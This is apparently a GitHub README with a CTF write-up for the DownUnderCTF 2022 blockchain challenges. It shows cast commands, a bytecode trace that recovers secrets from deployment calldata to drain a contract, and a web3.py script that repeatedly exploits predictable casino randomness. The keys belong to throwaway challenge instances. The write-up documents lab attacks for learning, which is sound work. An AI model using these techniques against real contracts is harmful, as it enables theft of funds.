Name	Name	Last commit message	Last commit date
parent directory ..
CryptoCasino	CryptoCasino
EVMVaultMechanism	EVMVaultMechanism
SecretAndEphemeral	SecretAndEphemeral
SolveMe	SolveMe
README.md	README.md

Writeup for DownUnderCTF 2022 Blockchain Challenges

Table of Contents

Solve Me
Secret and Ephemeral
Crypto Casino
EVM Vault Mechanism

Foundry Setting Example

export FOUNDRY_ETH_RPC_URL=https://blockchain-secretandephemeral-8ea1a06ad5bc87ae-eth.2022.ductf.dev/
export PRIVATE_KEY=0x352b2b84acd9b65588c1c04b8cd0130b883b800ec1219af08e892757578acd19
export INSTANCE_ADDRESS=0x6E4198C61C75D1B4D1cbcd00707aAC7d76867cF8

Solve Me

cast send --legacy --private-key $PRIVATE_KEY $INSTANCE_ADDRESS "solveChallenge()"

Flag: DUCTF{muM_1_did_a_blonkchain!}

Secret and Ephemeral

$ cast block 4


baseFeePerGas        
difficulty           2
extraData            0xd883010a19846765746888676f312e31382e36856c696e757800000000000000b4f6ccd7a57c8c26496d51884d640d12eaa1b9089aa6ccb2f88e41fa38369ecb2caab38c54300e3630bd9c9c453b1e61bed287940ce19021e98b658749ce398201
gasLimit             4718380
gasUsed              412467
hash                 0x1f055892ea28c97622af29d88cc2e08d330d51fa71ba363d8a9e4d300b31f1fa
logsBloom            0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
miner                0x0000000000000000000000000000000000000000
mixHash              0x0000000000000000000000000000000000000000000000000000000000000000
nonce                0x0000000000000000
number               4
parentHash           0x12813305017ea5a2ff9478d6ff33e6f0ded7634e3b0058cd8097c311de053803
receiptsRoot         0x2b6c5345a4e411cdc4903d21da6b4eacb15be1c4c5866316349ba632e9b75af2
sealFields           []
sha3Uncles           0x1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347
size                 2758
stateRoot            0xc93ef167d6a398a32d51910c8cc97645c63f0949e3767a2c853a81dc63fc71a1
timestamp            1664346293
totalDifficulty      9
transactions:        [
        0x33252839d47608a1259bfe12910fdb699dd1cb2c695804ce483b870688718582
        0xd3383dd590ea361847180c3616faed3a091c3e8f3296771e0c2844b2746d408f
]

$ cast tx 0xd3383dd590ea361847180c3616faed3a091c3e8f3296771e0c2844b2746d408f

blockHash            0x1f055892ea28c97622af29d88cc2e08d330d51fa71ba363d8a9e4d300b31f1fa
blockNumber          4
from                 0x7BCF8A237e5d8900445C148FC2b119670807575b
gas                  391467
gasPrice             1000000000
hash                 0xd3383dd590ea361847180c3616faed3a091c3e8f3296771e0c2844b2746d408f
input                0x6301e1338060015560c060405260046080908152636570696360e01b60a05260029061002b908261013c565b5034801561003857600080fd5b506040516106fd3803806106fd833981016040819052610057916101fb565b6003610063838261013c565b506003813360405160200161007a939291906102ca565b60405160208183030381529060405280519060200120600581905550505061035a565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806100c757607f821691505b6020821081036100e757634e487b7160e01b600052602260045260246000fd5b50919050565b601f82111561013757600081815260208120601f850160051c810160208610156101145750805b601f850160051c820191505b8181101561013357828155600101610120565b5050505b505050565b81516001600160401b038111156101555761015561009d565b6101698161016384546100b3565b846100ed565b602080601f83116001811461019e57600084156101865750858301515b600019600386901b1c1916600185901b178555610133565b600085815260208120601f198616915b828110156101cd578886015182559484019460019091019084016101ae565b50858210156101eb5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6000806040838503121561020e57600080fd5b82516001600160401b038082111561022557600080fd5b818501915085601f83011261023957600080fd5b81518181111561024b5761024b61009d565b604051601f8201601f19908116603f011681019083821181831017156102735761027361009d565b8160405282815260209350888484870101111561028f57600080fd5b600091505b828210156102b15784820184015181830185015290830190610294565b6000928101840192909252509401519395939450505050565b60008085546102d8816100b3565b600182811680156102f0576001811461030557610334565b60ff1984168752821515830287019450610334565b8960005260208060002060005b8581101561032b5781548a820152908401908201610312565b50505082870194505b50505094815260609390931b6001600160601b0319166020840152505060340192915050565b610394806103696000396000f3fe60806040526004361061004a5760003560e01c80631ac749ff1461004f57806323cfb56f146100775780637c46a9b014610081578063eb087bfb146100ae578063ecd424df146100c4575b600080fd5b34801561005b57600080fd5b5061006560015481565b60405190815260200160405180910390f35b61007f6100e4565b005b34801561008d57600080fd5b5061006561009c3660046101eb565b60046020526000908152604090205481565b3480156100ba57600080fd5b5061006560055481565b3480156100d057600080fd5b5061007f6100df366004610223565b61011e565b67016345785d8a000034116100f857600080fd5b33600090815260046020526040812080543492906101179084906102ee565b9091555050565b600083838360405160200161013593929190610315565b60405160208183030381529060405280519060200120905060055481146101985760405162461bcd60e51b81526020600482015260136024820152720a6dedacae8d0d2dccee640eee4dedcce40745606b1b604482015260640160405180910390fd5b6040514790339082156108fc029083906000818181858888f193505050501580156101c7573d6000803e3d6000fd5b505050505050565b80356001600160a01b03811681146101e657600080fd5b919050565b6000602082840312156101fd57600080fd5b610206826101cf565b9392505050565b634e487b7160e01b600052604160045260246000fd5b60008060006060848603121561023857600080fd5b833567ffffffffffffffff8082111561025057600080fd5b818601915086601f83011261026457600080fd5b8135818111156102765761027661020d565b604051601f8201601f19908116603f0116810190838211818310171561029e5761029e61020d565b816040528281528960208487010111156102b757600080fd5b826020860160208301376000602084830101528097505050505050602084013591506102e5604085016101cf565b90509250925092565b8082018082111561030f57634e487b7160e01b600052601160045260246000fd5b92915050565b6000845160005b81811015610336576020818801810151858301520161031c565b50919091019283525060601b6bffffffffffffffffffffffff1916602082015260340191905056fea2646970667358221220c558120b35ab560caa833f878d167e3c94af9005d6dea322262181580b0f895864736f6c634300081100330000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000dec0ded0000000000000000000000000000000000000000000000000000000000000022736f20616e79776179732069206a757374207374617274656420626c617374696e67000000000000000000000000000000000000000000000000000000000000
nonce                1
r                    0xcf50c8e0ed100baae3b31d69e45e7498caec66478e5ed9d884c3cedec6a14f82
s                    0x73ebe87f3541c26669adf9ef18e665f47f1a30796f8f4b7162795099807f7e5a
to                   
transactionIndex     1
v                    62710
value                0

input.txt:

6301e1338060015560c060405260046080908152636570696360e01b60a05260029061002b908261013c565b5034801561003857600080fd5b506040516106fd3803806106fd833981016040819052610057916101fb565b6003610063838261013c565b506003813360405160200161007a939291906102ca565b60405160208183030381529060405280519060200120600581905550505061035a565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806100c757607f821691505b6020821081036100e757634e487b7160e01b600052602260045260246000fd5b50919050565b601f82111561013757600081815260208120601f850160051c810160208610156101145750805b601f850160051c820191505b8181101561013357828155600101610120565b5050505b505050565b81516001600160401b038111156101555761015561009d565b6101698161016384546100b3565b846100ed565b602080601f83116001811461019e57600084156101865750858301515b600019600386901b1c1916600185901b178555610133565b600085815260208120601f198616915b828110156101cd578886015182559484019460019091019084016101ae565b50858210156101eb5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6000806040838503121561020e57600080fd5b82516001600160401b038082111561022557600080fd5b818501915085601f83011261023957600080fd5b81518181111561024b5761024b61009d565b604051601f8201601f19908116603f011681019083821181831017156102735761027361009d565b8160405282815260209350888484870101111561028f57600080fd5b600091505b828210156102b15784820184015181830185015290830190610294565b6000928101840192909252509401519395939450505050565b60008085546102d8816100b3565b600182811680156102f0576001811461030557610334565b60ff1984168752821515830287019450610334565b8960005260208060002060005b8581101561032b5781548a820152908401908201610312565b50505082870194505b50505094815260609390931b6001600160601b0319166020840152505060340192915050565b610394806103696000396000f3fe60806040526004361061004a5760003560e01c80631ac749ff1461004f57806323cfb56f146100775780637c46a9b014610081578063eb087bfb146100ae578063ecd424df146100c4575b600080fd5b34801561005b57600080fd5b5061006560015481565b60405190815260200160405180910390f35b61007f6100e4565b005b34801561008d57600080fd5b5061006561009c3660046101eb565b60046020526000908152604090205481565b3480156100ba57600080fd5b5061006560055481565b3480156100d057600080fd5b5061007f6100df366004610223565b61011e565b67016345785d8a000034116100f857600080fd5b33600090815260046020526040812080543492906101179084906102ee565b9091555050565b600083838360405160200161013593929190610315565b60405160208183030381529060405280519060200120905060055481146101985760405162461bcd60e51b81526020600482015260136024820152720a6dedacae8d0d2dccee640eee4dedcce40745606b1b604482015260640160405180910390fd5b6040514790339082156108fc029083906000818181858888f193505050501580156101c7573d6000803e3d6000fd5b505050505050565b80356001600160a01b03811681146101e657600080fd5b919050565b6000602082840312156101fd57600080fd5b610206826101cf565b9392505050565b634e487b7160e01b600052604160045260246000fd5b60008060006060848603121561023857600080fd5b833567ffffffffffffffff8082111561025057600080fd5b818601915086601f83011261026457600080fd5b8135818111156102765761027661020d565b604051601f8201601f19908116603f0116810190838211818310171561029e5761029e61020d565b816040528281528960208487010111156102b757600080fd5b826020860160208301376000602084830101528097505050505050602084013591506102e5604085016101cf565b90509250925092565b8082018082111561030f57634e487b7160e01b600052601160045260246000fd5b92915050565b6000845160005b81811015610336576020818801810151858301520161031c565b50919091019283525060601b6bffffffffffffffffffffffff1916602082015260340191905056fea2646970667358221220c558120b35ab560caa833f878d167e3c94af9005d6dea322262181580b0f895864736f6c634300081100330000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000dec0ded0000000000000000000000000000000000000000000000000000000000000022736f20616e79776179732069206a757374207374617274656420626c617374696e67000000000000000000000000000000000000000000000000000000000000

$ erever -f src/DownUnderCTF2022/SecretAndEphemeral/input.txt --trace | grep KECCAK256 -A 2
0x1a7: KECCAK256(offset:0x00, size:0x20)
        input   0000000000000000000000000000000000000000000000000000000000000003
        stack   [0xc2575a0e9e593c00f959f8c92f12db2869c3395a3b0502d05e2516446f71f85b, 0x00, 0x01, 0x20, 0x20, 0x22, 0x03, 0x0160, 0x63, 0x03, 0x0dec0ded, 0x0160]
--
0x30f: KECCAK256(offset:0x00, size:0x20)
        input   0000000000000000000000000000000000000000000000000000000000000003
        stack   [0xc2575a0e9e593c00f959f8c92f12db2869c3395a3b0502d05e2516446f71f85b, 0x20, 0x01, 0x01, 0x22, 0x45, 0x00, 0x00, 0x0200, 0x00, 0x0dec0ded, 0x03, 0x7a, 0x0dec0ded, 0x0160]
--
0x090: KECCAK256(offset:0x0200, size:0x56)
        input   736f20616e79776179732069206a757374207374617274656420626c617374696e67000000000000000000000000000000000000000000000000000000000dec0ded0000000000000000000000000000000000000000
        stack   [0x6d824e64b8b76112000b269b31bda718c9c7d489babeaf84a2dcd3c91a329309, 0x0dec0ded, 0x0160]

not_yours: 0x736f20616e79776179732069206a757374207374617274656420626c617374696e67 (so anyways i just started blasting)

secret_number: 0x000000000000000000000000000000000000000000000000000000000dec0ded

owner: 0x7BCF8A237e5d8900445C148FC2b119670807575b

cast send --legacy --private-key $PRIVATE_KEY $INSTANCE_ADDRESS "retrieveTheFunds(string,uint256,address)" "so anyways i just started blasting" 233573869 0x7BCF8A237e5d8900445C148FC2b119670807575b

Flag: DUCTF{u_r_a_web3_t1me_7raveler_:)}

Crypto Casino

from web3 import Web3
import json

w3 = Web3(Web3.HTTPProvider('https://blockchain-cryptocasino-468129ee23c33222-eth.2022.ductf.dev:443/'))

private_key = "0x489ada60affa1f5aa99353561a85020570dd5163e5decaf7fec93072376289f3"
player_address = "0x801da62Bf5bB02Da223147E13010025Bc841800A"

exploit_abi = json.load(open("out/Exploit.sol/Exploit.json"))["abi"]
exploit = w3.eth.contract(address="0xFAa598083775387feC2D170EB85055C420B97b20", abi=exploit_abi)

chain_id = 31337
gas_limit = 2000000

def send(function):
    txn = function.build_transaction({'chainId': chain_id, 'gas': gas_limit, 'gasPrice': w3.toWei('1', 'gwei'), 'nonce': w3.eth.getTransactionCount(player_address), })
    signed_txn = w3.eth.account.sign_transaction(txn, private_key=private_key)
    w3.eth.send_raw_transaction(signed_txn.rawTransaction)
    tx_hash = w3.toHex(w3.keccak(signed_txn.rawTransaction))
    tx_receipt = w3.eth.wait_for_transaction_receipt(tx_hash)
    return tx_receipt

for i in range(100):
    tx_receipt = send(exploit.functions.exploit())
    print(tx_receipt["status"])

Flag: DUCTF{sh0uldv3_us3d_a_vrf??}

EVM Vault Mechanism

-> EVM Vault Mechanism

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

DownUnderCTF2022

DownUnderCTF2022

README.md

Writeup for DownUnderCTF 2022 Blockchain Challenges

Solve Me

Secret and Ephemeral

Crypto Casino

EVM Vault Mechanism

Files

DownUnderCTF2022

Directory actions

More options

Directory actions

More options

Latest commit

History

DownUnderCTF2022

Folders and files

parent directory

README.md

Writeup for DownUnderCTF 2022 Blockchain Challenges

Solve Me

Secret and Ephemeral

Crypto Casino

EVM Vault Mechanism